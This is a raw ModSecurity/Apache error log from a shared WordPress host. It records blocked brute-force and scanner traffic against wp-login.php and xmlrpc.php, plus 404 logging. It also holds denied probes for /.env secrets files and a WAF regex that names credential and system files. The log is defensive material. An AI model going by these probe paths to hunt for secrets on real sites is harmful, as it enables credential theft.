[Tue May 26 17:19:30.274435 2026] [security2:error] [pid 869189:tid 869388] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIytB5TZSn88J_oroDmgAAAEQ"]
[Tue May 26 17:19:30.761505 2026] [security2:error] [pid 869189:tid 869266] [remote 3.208.180.187:39676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIytB5TZSn88J_oroDpwAACEs"]
[Tue May 26 17:19:30.881089 2026] [security2:error] [pid 869189:tid 869294] [remote 57.141.2.7:22882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWIytB5TZSn88J_oroDwQAAVGc"]
[Tue May 26 17:19:30.943557 2026] [security2:error] [pid 869189:tid 869397] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIytB5TZSn88J_oroDvQAAAE0"]
[Tue May 26 17:19:31.296788 2026] [security2:error] [pid 869189:tid 869345] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIytB5TZSn88J_oroDxwAAABk"]
[Tue May 26 17:19:31.502561 2026] [autoindex:error] [pid 869189:tid 869354] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/themes/twentytwentyfour/patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:31.612610 2026] [security2:error] [pid 869189:tid 869405] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIytB5TZSn88J_oroDygAAAFU"], referer: https://google.com/
[Tue May 26 17:19:32.062887 2026] [security2:error] [pid 869189:tid 869370] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIy9B5TZSn88J_oroD-gAAADI"]
[Tue May 26 17:19:32.737199 2026] [security2:error] [pid 869189:tid 869358] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIzNB5TZSn88J_oroEAwAAACY"], referer: https://google.com/
[Tue May 26 17:19:33.092043 2026] [security2:error] [pid 869189:tid 869365] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIzNB5TZSn88J_oroEHQAAAC0"]
[Tue May 26 17:19:33.692136 2026] [security2:error] [pid 869189:tid 869393] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIzdB5TZSn88J_oroEOwAAAEk"]
[Tue May 26 17:19:33.735874 2026] [security2:error] [pid 869189:tid 869378] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIzdB5TZSn88J_oroEMgAAADo"]
[Tue May 26 17:19:33.866176 2026] [security2:error] [pid 869189:tid 869361] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIzdB5TZSn88J_oroELwAAACk"], referer: https://google.com/
[Tue May 26 17:19:34.057866 2026] [security2:error] [pid 869189:tid 869405] [client 69.58.64.198:30659] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWIzdB5TZSn88J_oroEPQAAAFU"], referer: https://anujtradingco.com
[Tue May 26 17:19:34.059601 2026] [security2:error] [pid 869189:tid 869366] [client 185.92.25.54:64639] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIzdB5TZSn88J_oroESwAAAC4"]
[Tue May 26 17:19:34.438713 2026] [security2:error] [pid 869189:tid 869404] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIztB5TZSn88J_oroEWAAAAFQ"]
[Tue May 26 17:19:34.674125 2026] [autoindex:error] [pid 869189:tid 869331] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:35.021895 2026] [security2:error] [pid 869189:tid 869389] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWIztB5TZSn88J_oroEWwAAAEU"], referer: https://google.com/
[Tue May 26 17:19:35.422698 2026] [security2:error] [pid 869189:tid 869439] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIz9B5TZSn88J_oroEdQAAAHc"]
[Tue May 26 17:19:35.805662 2026] [security2:error] [pid 869189:tid 869399] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIz9B5TZSn88J_oroEhQAAAE8"]
[Tue May 26 17:19:36.025066 2026] [security2:error] [pid 869189:tid 869379] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIz9B5TZSn88J_oroEggAAADs"]
[Tue May 26 17:19:36.038893 2026] [security2:error] [pid 869189:tid 869339] [client 203.194.101.7:61613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI0NB5TZSn88J_oroEkAAAABM"]
[Tue May 26 17:19:36.038992 2026] [security2:error] [pid 869189:tid 869339] [client 203.194.101.7:61613] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI0NB5TZSn88J_oroEkAAAABM"]
[Tue May 26 17:19:36.536862 2026] [autoindex:error] [pid 869189:tid 869419] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:36.991220 2026] [security2:error] [pid 869189:tid 869368] [client 223.235.98.214:4884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI0NB5TZSn88J_oroEqQAAADA"]
[Tue May 26 17:19:36.991852 2026] [security2:error] [pid 869189:tid 869368] [client 223.235.98.214:4884] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI0NB5TZSn88J_oroEqQAAADA"]
[Tue May 26 17:19:37.377547 2026] [autoindex:error] [pid 869189:tid 869377] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/jcrop/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:37.496792 2026] [security2:error] [pid 869189:tid 869230] [remote 5.78.119.122:39022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWI0dB5TZSn88J_oroEsQAAEic"]
[Tue May 26 17:19:37.701271 2026] [security2:error] [pid 869189:tid 869417] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI0dB5TZSn88J_oroEvgAAAGE"]
[Tue May 26 17:19:38.075030 2026] [security2:error] [pid 869189:tid 869366] [client 72.14.147.185:38332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclubbanquet.com"] [uri "/.env"] [unique_id "ahWI0tB5TZSn88J_oroEzgAAAC4"]
[Tue May 26 17:19:38.215350 2026] [security2:error] [pid 869189:tid 869332] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI0tB5TZSn88J_oroEzQAAAAw"]
[Tue May 26 17:19:39.244001 2026] [security2:error] [pid 869189:tid 869394] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI0tB5TZSn88J_oroE5gAAAEo"]
[Tue May 26 17:19:39.579601 2026] [security2:error] [pid 869189:tid 869416] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI09B5TZSn88J_oroE8gAAAGA"]
[Tue May 26 17:19:40.094522 2026] [autoindex:error] [pid 869189:tid 869379] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/block-bindings/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:40.459519 2026] [security2:error] [pid 869189:tid 869418] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI1NB5TZSn88J_oroFFwAAAGI"]
[Tue May 26 17:19:40.625872 2026] [security2:error] [pid 869189:tid 869356] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI1NB5TZSn88J_oroFEAAAACQ"]
[Tue May 26 17:19:40.876175 2026] [security2:error] [pid 869189:tid 869344] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI1NB5TZSn88J_oroFJAAAABg"]
[Tue May 26 17:19:41.272185 2026] [autoindex:error] [pid 869189:tid 869377] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Requests/library/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:41.611297 2026] [security2:error] [pid 869189:tid 869437] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI1dB5TZSn88J_oroFPgAAAHU"]
[Tue May 26 17:19:41.962317 2026] [security2:error] [pid 869189:tid 869348] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI1dB5TZSn88J_oroFSQAAABw"]
[Tue May 26 17:19:42.302064 2026] [security2:error] [pid 869189:tid 869358] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI1tB5TZSn88J_oroFXgAAACY"]
[Tue May 26 17:19:42.375476 2026] [security2:error] [pid 869189:tid 869397] [client 185.92.25.54:64639] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI1tB5TZSn88J_oroFZQAAAE0"]
[Tue May 26 17:19:42.443249 2026] [security2:error] [pid 869189:tid 869333] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI1tB5TZSn88J_oroFaAAAAA0"]
[Tue May 26 17:19:42.651783 2026] [security2:error] [pid 869189:tid 869447] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI1tB5TZSn88J_oroFZAAAAH8"]
[Tue May 26 17:19:42.948065 2026] [security2:error] [pid 869189:tid 869410] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI1tB5TZSn88J_oroFdwAAAFo"]
[Tue May 26 17:19:43.361272 2026] [security2:error] [pid 869189:tid 869401] [client 72.14.147.185:46412] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclubbanquet.com"] [uri "/api/.env"] [unique_id "ahWI19B5TZSn88J_oroFjgAAAFE"]
[Tue May 26 17:19:43.361536 2026] [security2:error] [pid 869189:tid 869382] [client 72.14.147.185:46422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclubbanquet.com"] [uri "/backend/.env"] [unique_id "ahWI19B5TZSn88J_oroFkAAAAD4"]
[Tue May 26 17:19:43.459920 2026] [security2:error] [pid 869189:tid 869351] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI19B5TZSn88J_oroFhwAAAB8"]
[Tue May 26 17:19:43.502388 2026] [security2:error] [pid 869189:tid 869381] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI19B5TZSn88J_oroFkwAAAD0"]
[Tue May 26 17:19:43.509097 2026] [security2:error] [pid 869189:tid 869408] [client 72.14.147.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahWI19B5TZSn88J_oroFlQAAAFg"]
[Tue May 26 17:19:43.961672 2026] [security2:error] [pid 869189:tid 869379] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI19B5TZSn88J_oroFowAAADs"]
[Tue May 26 17:19:44.451669 2026] [security2:error] [pid 869189:tid 869355] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI2NB5TZSn88J_oroFrgAAACM"]
[Tue May 26 17:19:44.985026 2026] [security2:error] [pid 869189:tid 869412] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI2NB5TZSn88J_oroFsgAAAFw"]
[Tue May 26 17:19:45.115759 2026] [security2:error] [pid 869189:tid 869321] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI2NB5TZSn88J_oroFxgAAAAE"]
[Tue May 26 17:19:45.607774 2026] [security2:error] [pid 869189:tid 869363] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI2dB5TZSn88J_oroF3QAAACs"]
[Tue May 26 17:19:45.680249 2026] [security2:error] [pid 869189:tid 869322] [client 223.237.92.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI2dB5TZSn88J_oroFzwAAAAI"]
[Tue May 26 17:19:46.216663 2026] [security2:error] [pid 869189:tid 869341] [client 203.194.101.7:61943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI2tB5TZSn88J_oroF-AAAABU"]
[Tue May 26 17:19:46.216773 2026] [security2:error] [pid 869189:tid 869341] [client 203.194.101.7:61943] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI2tB5TZSn88J_oroF-AAAABU"]
[Tue May 26 17:19:46.282949 2026] [security2:error] [pid 869189:tid 869396] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI2tB5TZSn88J_oroF9AAAAEw"]
[Tue May 26 17:19:46.847203 2026] [security2:error] [pid 869189:tid 869337] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI2tB5TZSn88J_oroGEQAAABE"]
[Tue May 26 17:19:47.397001 2026] [security2:error] [pid 869189:tid 869366] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI29B5TZSn88J_oroGGwAAAC4"]
[Tue May 26 17:19:47.675275 2026] [security2:error] [pid 869189:tid 869406] [client 223.235.98.214:3311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI29B5TZSn88J_oroGKAAAAFY"]
[Tue May 26 17:19:47.675378 2026] [security2:error] [pid 869189:tid 869406] [client 223.235.98.214:3311] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI29B5TZSn88J_oroGKAAAAFY"]
[Tue May 26 17:19:47.711020 2026] [security2:error] [pid 869189:tid 869443] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI29B5TZSn88J_oroGHgAAAHs"]
[Tue May 26 17:19:48.080515 2026] [security2:error] [pid 869189:tid 869340] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI29B5TZSn88J_oroGMQAAABQ"]
[Tue May 26 17:19:48.589582 2026] [security2:error] [pid 869189:tid 869369] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI3NB5TZSn88J_oroGQAAAADE"]
[Tue May 26 17:19:49.286573 2026] [security2:error] [pid 869189:tid 869394] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWI3dB5TZSn88J_oroGTwAAAEo"]
